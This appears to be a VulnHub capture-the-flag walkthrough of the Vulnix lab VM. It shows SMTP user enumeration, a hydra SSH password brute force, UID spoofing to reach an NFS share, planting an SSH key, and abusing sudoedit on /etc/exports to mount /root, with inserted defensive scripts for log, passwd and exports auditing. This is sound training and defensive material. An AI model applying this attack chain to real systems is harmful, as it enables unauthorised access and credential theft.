Thursday, October 10, 2019

VulnHub: Vulnix Walkthrough

Let's first start off with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -p0-65355 -sV -O -sC -T5 192.168.56.107

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-09 12:37 MDT
Warning: 192.168.56.107 giving up on port because retransmission cap hit (2).
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 13.56% done; ETC: 12:39 (0:01:48 remaining)
Stats: 0:04:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.74% done; ETC: 12:41 (0:00:00 remaining)
Nmap scan report for 192.168.56.107
Host is up (0.00069s latency).
Not shown: 65319 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open     smtp       Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
79/tcp    open     finger     Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open     pop3       Dovecot pop3d
|_pop3-capabilities: CAPA TOP SASL RESP-CODES STLS UIDL PIPELINING
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
111/tcp   open     rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      36380/tcp  mountd
|   100005  1,2,3      52886/udp  mountd
|   100021  1,3,4      52205/udp  nlockmgr
|   100021  1,3,4      52432/tcp  nlockmgr
|   100024  1          35179/udp  status
|   100024  1          41320/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
143/tcp   open     imap       Dovecot imapd
|_imap-capabilities: ID have SASL-IR capabilities OK more listed post-login Pre-login IMAP4rev1 STARTTLS LOGIN-REFERRALS IDLE LOGINDISABLEDA0001 LITERAL+ ENABLE
|_ssl-date: 2019-10-09T18:40:57+00:00; -2s from scanner time.
512/tcp   open     exec       netkit-rsh rexecd
513/tcp   open     login
514/tcp   open     shell      Netkit rshd
993/tcp   open     ssl/imaps?
|_ssl-date: 2019-10-09T18:40:56+00:00; -2s from scanner time.
995/tcp   open     ssl/pop3s?
|_ssl-date: 2019-10-09T18:40:56+00:00; -2s from scanner time.
2049/tcp  open     nfs_acl    2-3 (RPC #100227)
36380/tcp open     mountd     1-3 (RPC #100005)
41320/tcp open     status     1 (RPC #100024)
46857/tcp open     mountd     1-3 (RPC #100005)
52432/tcp open     nlockmgr   1-4 (RPC #100021)
57416/tcp open     mountd     1-3 (RPC #100005)
MAC Address: 08:00:27:F0:66:94 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 341.14 seconds
root@ubuntu:~/src#

We found quite a few open ports on the remote machine: 22, 25, 79, 110, 111, 143, 512, 513, 514. Our next task is to enumerate users on the system via SMTP and the VRFY command.

root@ubuntu:~/src# smtp-user-enum -M VRFY -U /home/sam/wordlists/unix_users.txt -t 192.168.56.107
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/sam/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 113
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Oct  9 14:19:55 2019 #########
192.168.56.107: ROOT exists
192.168.56.107: backup exists
192.168.56.107: bin exists
192.168.56.107: daemon exists
192.168.56.107: games exists
192.168.56.107: gnats exists
192.168.56.107: irc exists
192.168.56.107: libuuid exists
192.168.56.107: list exists
192.168.56.107: lp exists
192.168.56.107: man exists
192.168.56.107: mail exists
192.168.56.107: news exists
192.168.56.107: messagebus exists
192.168.56.107: nobody exists
192.168.56.107: postmaster exists
192.168.56.107: proxy exists
192.168.56.107: root exists
192.168.56.107: sshd exists
192.168.56.107: sync exists
192.168.56.107: sys exists
192.168.56.107: syslog exists
192.168.56.107: uucp exists
192.168.56.107: user exists
192.168.56.107: www-data exists
######## Scan completed at Wed Oct  9 14:19:56 2019 #########
25 results.

113 queries in 1 seconds (113.0 queries / sec)
root@ubuntu:~/src# 

As you can see we have found a few users that exist on the system, but the 'user' account catches my eye, so I move on to brute-forcing it over SSH.

root@ubuntu:~/src# hydra -l user -P /home/sam/wordlists/unix_passwords.txt ssh://192.168.56.107 -t 4
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-09 17:23:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1009 login tries (l:1/p:1009), ~253 tries per task
[DATA] attacking ssh://192.168.56.107:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 945 to do in 00:15h, 4 active
[STATUS] 61.33 tries/min, 184 tries in 00:03h, 825 to do in 00:14h, 4 active
[STATUS] 60.00 tries/min, 420 tries in 00:07h, 589 to do in 00:10h, 4 active
[22][ssh] host: 192.168.56.107   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-09 17:31:52
root@ubuntu:~/src# 
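From the defender's side, the hydra run above leaves a very recognisable trail in the SSH daemon's log: a burst of "Failed password" lines from one source at roughly one per second, followed by an "Accepted password". The script below is an added example, not part of the original post, that parses constructed auth.log-style sshd lines and flags any source with five or more failures inside a sixty-second window, noting whether a successful login from the same source followed. The sample lines, the year (syslog omits it) and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log-style sshd lines (not captured from the Vulnix VM). The burst from
# 192.168.56.1 mimics what a hydra run at ~60 tries/min leaves behind; the last two lines
# are ordinary traffic from other hosts.
SAMPLE_AUTH_LOG = """\
Oct  9 17:23:02 vulnix sshd[1402]: Failed password for user from 192.168.56.1 port 50122 ssh2
Oct  9 17:23:03 vulnix sshd[1404]: Failed password for user from 192.168.56.1 port 50124 ssh2
Oct  9 17:23:03 vulnix sshd[1406]: Failed password for invalid user admin from 192.168.56.1 port 50126 ssh2
Oct  9 17:23:04 vulnix sshd[1408]: Failed password for user from 192.168.56.1 port 50128 ssh2
Oct  9 17:23:05 vulnix sshd[1410]: Failed password for user from 192.168.56.1 port 50130 ssh2
Oct  9 17:23:06 vulnix sshd[1412]: Failed password for user from 192.168.56.1 port 50132 ssh2
Oct  9 17:31:52 vulnix sshd[1990]: Accepted password for user from 192.168.56.1 port 51000 ssh2
Oct  9 17:40:10 vulnix sshd[2100]: Failed password for root from 10.0.0.5 port 40000 ssh2
Oct  9 17:55:00 vulnix sshd[2200]: Accepted publickey for vulnix from 10.0.0.9 port 41000 ssh2
"""

# syslog lines carry no year, so the caller supplies one (assumed 2019 to match the post).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_sshd(lines, year=2019):
    """Return (timestamp, result, method, user, source_ip) tuples for recognised sshd lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue  # not an authentication outcome line; ignore
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["src"]))
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Flag each source with >= threshold failed logins inside any window_seconds span.

    Returns {source_ip: {"failures": peak_count_in_window, "success_after": bool}} where
    success_after means an Accepted login from the same source followed the last failure,
    i.e. the guessing most likely succeeded.
    """
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, _method, _user, src in events:
        (failures if result == "Failed" else successes)[src].append(ts)

    alerts = {}
    for src, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over the sorted failure times
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_failure = times[-1]
            alerts[src] = {
                "failures": peak,
                "success_after": any(t > last_failure for t in successes.get(src, [])),
            }
    return alerts


if __name__ == "__main__":
    for src, info in find_bruteforce(parse_sshd(SAMPLE_AUTH_LOG.splitlines())).items():
        outcome = "followed by a successful login" if info["success_after"] else "no success seen"
        print(f"{src}: {info['failures']} failures in window, {outcome}")
```

The "success_after" flag is the part worth alerting on with high priority: a burst of failures is noise on any internet-facing host, but a burst followed by an accepted password from the same source is the signature of a guessed credential. Throttling with something like fail2ban, or disabling password authentication in sshd_config, removes the attack surface hydra relied on here.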

We cracked the password for user. Now it's time to log in and see what we can find.

root@ubuntu:~/src# ssh user@192.168.56.107
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.107' (ECDSA) to the list of known hosts.
user@192.168.56.107's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Oct 10 19:51:01 BST 2019

  System load:  0.08             Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 3%               IP address for eth0: 192.168.56.107
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$ 

Our first step is to cat the /etc/passwd file to see if there are any more users on the system to be enumerated.

user@vulnix:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:/home$
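The /etc/passwd listing above can be read programmatically. The following Python script is an added example, not from the original post, that parses the passwd format, separates regular accounts from system accounts by UID range and shell, exposes the UID of each account (the number that matters for the NFS share later), and reports the kinds of anomaly a reviewer looks for in this file: duplicate UIDs, extra UID-0 accounts, and system accounts that still have a login shell. The sample is a constructed excerpt of the entries shown above; the UID 1000 boundary is the Debian/Ubuntu convention.

```python
from dataclasses import dataclass

# Constructed excerpt in /etc/passwd format, a handful of the entries shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
"""

# Shells that cannot start an interactive session.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
FIRST_REGULAR_UID = 1000  # Debian/Ubuntu convention (UID_MIN in login.defs); assumed
NOBODY_UID = 65534


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def interactive(self) -> bool:
        return self.shell not in NOLOGIN_SHELLS

    @property
    def regular(self) -> bool:
        """A human account: regular UID range, not nobody, and able to log in."""
        return self.uid >= FIRST_REGULAR_UID and self.uid != NOBODY_UID and self.interactive


def parse_passwd(text):
    """Parse passwd-format text into PasswdEntry objects; the password field is ignored."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, _password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def regular_users(entries):
    return [e.name for e in entries if e.regular]


def uid_of(entries, name):
    """UID for a login name, or None if absent."""
    return next((e.uid for e in entries if e.name == name), None)


def review(entries):
    """Anomalies a reviewer would flag in a passwd file, in file order."""
    notes = []
    seen = {}  # uid -> first name seen with it
    for e in entries:
        if e.uid == 0 and e.name != "root":
            notes.append(f"{e.name}: extra UID 0 account")
        if e.uid in seen:
            notes.append(f"{e.name}: shares UID {e.uid} with {seen[e.uid]}")
        seen.setdefault(e.uid, e.name)
        if 0 < e.uid < FIRST_REGULAR_UID and e.interactive:
            notes.append(f"{e.name}: system account with login shell {e.shell}")
    return notes


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("regular users:", regular_users(entries))
    print("uid of vulnix:", uid_of(entries, "vulnix"))
    for note in review(entries):
        print("review:", note)
```

On the sample the only review note is daemon keeping /bin/sh, which was the Ubuntu 12.04 default for system accounts; later releases ship them with nologin shells. The UID lookup is the piece that becomes security-relevant in the NFS section, where the server accepts a client-asserted UID.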

Only two regular users exist: vulnix and user. So let's now search for SUID binaries.

user@vulnix:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
user@vulnix:~$ 

We check sudo privileges.

user@vulnix:~$ sudo -l
[sudo] password for user: 
Sorry, user user may not run sudo on vulnix.
user@vulnix:~$ 

No sudo rights for this user. Let's try to enter the vulnix home directory.

user@vulnix:~$ cd /home;ls -la
total 16
drwxr-xr-x  4 root   root   4096 Sep  2  2012 .
drwxr-xr-x 22 root   root   4096 Sep  2  2012 ..
drwxr-x---  3 user   user   4096 Sep  2  2012 user
drwxr-x---  2 vulnix vulnix 4096 Sep  2  2012 vulnix
user@vulnix:/home$ cd vulnix/
-bash: cd: vulnix/: Permission denied
user@vulnix:/home$ 

Nothing interesting here, so let's move on to the next service: NFS.

Enumerating NFS

First we query the remote host with rpcinfo to verify NFS is running.

root@ubuntu:~/src# rpcinfo -p 192.168.56.107
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  44702  status
    100024    1   tcp  40130  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  38605  nlockmgr
    100021    3   udp  38605  nlockmgr
    100021    4   udp  38605  nlockmgr
    100021    1   tcp  56235  nlockmgr
    100021    3   tcp  56235  nlockmgr
    100021    4   tcp  56235  nlockmgr
    100005    1   udp  57530  mountd
    100005    1   tcp  35549  mountd
    100005    2   udp  56428  mountd
    100005    2   tcp  53138  mountd
    100005    3   udp  56870  mountd
    100005    3   tcp  60835  mountd
root@ubuntu:~/src# 

root@ubuntu:~/src# rpcinfo -n 2049 -t 192.168.56.107 100003
program 100003 version 2 ready and waiting
program 100003 version 3 ready and waiting
program 100003 version 4 ready and waiting
root@ubuntu:~/src# 

Once we know it's up and running we can use the showmount command to see what shares, if any, it has available.

root@ubuntu:~/src# showmount -e 192.168.56.107
Export list for 192.168.56.107:
/home/vulnix *
root@ubuntu:~/src#

We can see they are sharing the /home/vulnix directory. Let's try to mount the share and see what's in it.

root@ubuntu:~# mkdir /mnt/loot
root@ubuntu:~# mount -t nfs 192.168.56.107:/home/vulnix /mnt/loot
root@ubuntu:~# cd /mnt/loot
bash: cd: /mnt/loot: Permission denied
root@ubuntu:~# 

We get permission denied when we try to access the remotely mounted share. What we need is a local user with the same UID as the vulnix user. If you remember, we got the UID of vulnix when we cat'd the /etc/passwd file:

vulnix:x:2008:2008::/home/vulnix:/bin/bash

We can add a user and specify the UID with the useradd utility.

useradd -u 2008 vulnix

Once we have the user added we can su to the user vulnix and try to browse the share.

$ whoami
vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ ls -la
total 28
drwxr-x--- 4 vulnix vulnix 4096 Oct 10 13:35 .
drwxr-xr-x 4 root   root   4096 Oct 10 13:23 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
drwx------ 2 vulnix vulnix 4096 Oct 10 13:35 .cache
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
$ 

Our next task is to create a new SSH key and place it in the .ssh directory on the remote share so we can log in with our own key. For this we will use ssh-keygen.

root@ubuntu:~/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:R5ZR6Rzd62GVXiKOsqqDMgZHqlfA6GYJh3q5/K1eAc4 root@ubuntu
The key's randomart image is:
+---[RSA 2048]----+
|          ...o ..|
|           o+ o.+|
| +  .     += o..+|
|+ =o .  .o. +  = |
|++.oE . So.   o .|
|+=+ .  ...     . |
|=+ +  ..         |
|+.= .o.          |
|.+ o=+.          |
+----[SHA256]-----+
root@ubuntu:~/src# 

Once we have the key generated we can import it into the .ssh directory. The .ssh directory doesn't exist yet, so we will have to create it.

$ mkdir .ssh
$ cd .ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4O6oOf9oTUAvCdOdbsZYhyETxoNFAlCRx1oRknqUsk790zXPg7zYdZnH7XXQ5o54PJzaJoc2pR96cpIW2RX1Hy7ompbNJS1H03evtJXp73/xYJxbdj3IRqT/6V1y+/oh4SmUMA5MAzLUQa3OMrseAN/a1nWivgUuKoNscKf+ej5oKTDkn5a5avtnyzJhKz+tYdSZ/oU1dXp9WVp5SoXH1+OLOQLbvvzLrvzVbzyOaA1M3pQV8y83YQnBc0P6bJfzoem7tRI2w9lCgHenFnKkf9z9euUFkSBACriZc/f5mUhUZ2T8OwjvHufBSsd3zG1iglzV1ZXLBvTwrdFpiAx7l root@ubuntu" > authorized_keys

Now that we have our key successfully imported, it's time to log in and see if it worked.

root@ubuntu:/root/.ssh# ssh vulnix@192.168.56.107
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Oct 10 20:35:53 BST 2019

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 4%               IP address for eth0: 192.168.56.107
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ 

It worked! So now we move on to enumerating the vulnix user to try and elevate our privileges.

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ 

We can edit the /etc/exports file, which contains the configuration for the NFS exports.

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

As you can see, the configuration for the /home/vulnix share has root_squash enabled. By default, NFS shares map the root user to the nfsnobody user, an unprivileged user account. In this way, all root-created files are owned by nfsnobody. If no_root_squash is used, remote root users are able to change any file on the shared file system.

We want to add an entry to the exports file that allows us full access to the remote share using the no_root_squash option.

After this you have to restart the VM manually for the changes to take effect.
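As an added illustration, not part of the original walkthrough, the following Python script parses an exports file in the format shown above and flags the settings that made this box exploitable: a wildcard client list, no_root_squash, and the default sec=sys authentication under which the server trusts whatever UID the client presents (the reason the useradd -u 2008 step earlier worked). It also shows the same share restricted to one client network with root squashing kept on. Both exports texts are constructed; the /root line is an assumption about what the added entry looked like, since the page only shows its effect in the showmount output.

```python
import re

# Constructed exports content (not the page's own file). The /root line stands in for the
# entry the walkthrough adds; the page shows only its effect in the later showmount output.
WEAK_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix    *(rw,root_squash)
/root           *(rw,no_root_squash)
"""

# Same share, restricted to one client network, with root squashing kept on.
HARDENED_EXPORTS = """\
/home/vulnix    192.168.56.0/24(rw,sync,root_squash,no_subtree_check)
"""

# exports(5) client spec: host, optionally followed by (opt,opt,...) with no space before "(".
CLIENT_RE = re.compile(r"(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?")
SENSITIVE_PATHS = {"/", "/root", "/etc", "/home"}


def parse_exports(text):
    """Return [(path, [(host, {options})])] for each non-comment export line."""
    exports = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        if not specs:
            specs = ["*"]  # a path with no client list is exported to everyone with defaults
        clients = []
        for spec in specs:
            m = CLIENT_RE.fullmatch(spec)
            if m is None:
                raise ValueError(f"line {lineno}: cannot parse client spec {spec!r}")
            opts = {o for o in (m["opts"] or "").split(",") if o}
            clients.append((m["host"], opts))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return (path, host, code, explanation) for each weak setting found."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if host in ("", "*") or host.startswith("*"):
                findings.append((path, host, "wildcard_host",
                                 "any client may mount this export"))
            if path in SENSITIVE_PATHS or path.startswith(("/root/", "/etc/")):
                findings.append((path, host, "sensitive_path",
                                 "exports a system or root-owned directory"))
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash",
                                 "client root keeps uid 0 on the server instead of being squashed"))
            # sec=sys (AUTH_SYS) is the default; only a Kerberos flavour without "sys" avoids it.
            if not any(o.startswith("sec=") and "sys" not in o for o in opts):
                findings.append((path, host, "auth_sys",
                                 "sec=sys: the server trusts the uid the client presents"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS)):
        print(f"== {label} ==")
        for path, host, code, why in audit_exports(text):
            print(f"{path} {host}: {code}: {why}")
```

The hardened file still yields one finding: with sec=sys, restricting the client list only narrows who can present a forged UID to hosts on that network, so the export is only as trustworthy as the machines allowed to mount it. Removing that residual risk means Kerberos (sec=krb5p) or not exporting home directories at all; and sudoedit on /etc/exports, as granted here, is equivalent to granting root, since whoever controls the file controls which client UIDs are honoured.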

root@ubuntu:/root/.ssh# showmount -e 192.168.56.107
Export list for 192.168.56.107:
/root        *
/home/vulnix *
root@ubuntu:/root/.ssh# mount -t nfs 192.168.56.107:/root /mnt/loot/
root@ubuntu:/root/.ssh# cd /mnt/loot/
root@ubuntu:/mnt/loot# ls -la
total 28
drwx------ 3 root root 4096 Sep  2  2012 .
drwxr-xr-x 4 root root 4096 Oct 10 13:23 ..
-rw------- 1 root root    0 Sep  2  2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19  2012 .bashrc
drwx------ 2 root root 4096 Sep  2  2012 .cache
-rw-r--r-- 1 root root  140 Apr 19  2012 .profile
-r-------- 1 root root   33 Sep  2  2012 trophy.txt
-rw------- 1 root root  710 Sep  2  2012 .viminfo
root@ubuntu:/mnt/loot# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be
root@ubuntu:/mnt/loot# 

As you can see, we successfully got the flag.
